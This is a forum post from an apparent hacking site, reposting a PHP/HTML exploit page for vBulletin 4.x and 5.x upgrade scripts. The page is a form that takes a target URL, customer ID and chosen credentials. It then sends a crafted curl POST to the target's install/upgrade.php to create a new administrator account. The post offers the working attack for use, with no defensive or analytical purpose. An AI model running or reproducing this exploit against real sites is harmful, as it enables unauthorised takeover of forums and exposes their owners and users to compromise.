HackerTop
https://hackertop.org/

vBulletin v4.x.x and 5.х.x Shell Upload / Remote Code Execut
https://hackertop.org/viewtopic.php?f=6&t=14
Page 1 of 1

Author:  admin [ Sun Jul 24, 2016 12:04 pm ]
Post subject:  vBulletin v4.x.x and 5.х.x Shell Upload / Remote Code Execut

Attachment:
vb.jpg
vb.jpg [ 15.42 KiB | Viewed 2170 times ]



Code:
<html xmlns="http://www.w3.org/1999/xhtml"><head>
 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
 
<title>vBulletin 0day</title>
 
<style type="text/css">
 
<!--
 
body {
 
background-color: #000;
 
text-align: center;
 
color: #063;
 
font-size: large;
 
}
 
.a { font-size: 24px;
 
}
 
.f { color: #060;
 
}
 
.gbf { color: #F00;
 
}
 
.dd {
 
color: #F00;
 
}
 
.w {
 
font-size: large;
 
}
 
a:link {
 
text-decoration: none;
 
}
 
a:visited {
 
text-decoration: none;
 
}
 
a:hover {
 
text-decoration: none;
 
}
 
a:active {
 
text-decoration: none;
 
}
 
-->
 
</style></head><body>
 
<p class="a">
 
 
<h1><span class="gbf">vBulletin</span> 4.x.x and 5.x.x Upgrade 0day Exploit</h1>
 
<br>Created by: 1337
<br>Found on: 08/22/2013
<br>Website: http://www.madleets.com
</p>
 
<br>
<?php
//extract data from the post
if(isset($_POST['submit'])){
extract($_POST);
//set POST variables
$url = $_POST['url'];
$fields = array(
'ajax' => urlencode('1'),
'version' => urlencode('install'),
'checktable' => urlencode('false'),
'firstrun' => urlencode('false'),
'step' => urlencode('7'),
'startat' => urlencode('0'),
'only' => urlencode('false'),
'customerid' => urlencode($_POST['customerid']),
'options[skiptemplatemerge]' => urlencode('0'),
'response' => urlencode('yes'),
'htmlsubmit' => urlencode('1'),
'htmldata[username]' => urlencode($_POST['username']),
'htmldata[password]' => urlencode($_POST['password']),
'htmldata[confirmpassword]' => urlencode($_POST['password']),
'htmldata[email]' => urlencode($_POST['email'])
);
//url-ify the data for the POST
foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; }
rtrim($fields_string, '&');
//open connection
$ch = curl_init();
//set the url, number of POST vars, POST data
curl_setopt($ch,CURLOPT_URL, $url);
curl_setopt($ch,CURLOPT_POST, count($fields));
curl_setopt($ch,CURLOPT_POSTFIELDS, $fields_string);
curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);
curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid='.$_POST['customerid'] );
//execute post
$result = curl_exec($ch);
//close connection
curl_close($ch);
exit();
}
?>
<center>
<form name="sploit" method="POST" action="<?php echo $_SERVER['REQUEST_URI']; ?>">
<span>Example:http://test.com/forum/install/upgrade.php</span><br>
<span>Website:</span>
<input name="url" type="text" tabindex="1" size="60" />
<br>
<span>Customer ID:</span>
<input name="customerid" type="text" tabindex="2" size="40" />
<br>
<span>Username:</span>
<input name="username" type="text" tabindex="3" size="40" />
<br>
<span>Password:</span>
<input name="password" type="text" tabindex="4" size="40" />
<br>
<span>Email:</span>
<input name="email" type="text" tabindex="5" maxlength="40" />
 
<input name="submit" type="submit" value="Inject Admin">
</form>
</center>
 
<p class="a">------------------------------------------------------------------------------------------------------------------</p>
 
<p class="a">We are L33t Pakistani H4x0rZ | MaDLeeTs TeaM </p>
 
<p class="a">------------------------------------------------------------------------------------------------------------------</p>
 
 
</div>
 
</pre>
 
<p class="a">&nbsp;</p>
<p align="center">
 
 
</body></html>

Page 1 of 1 All times are UTC
Powered by phpBB® Forum Software © phpBB Group
https://www.phpbb.com/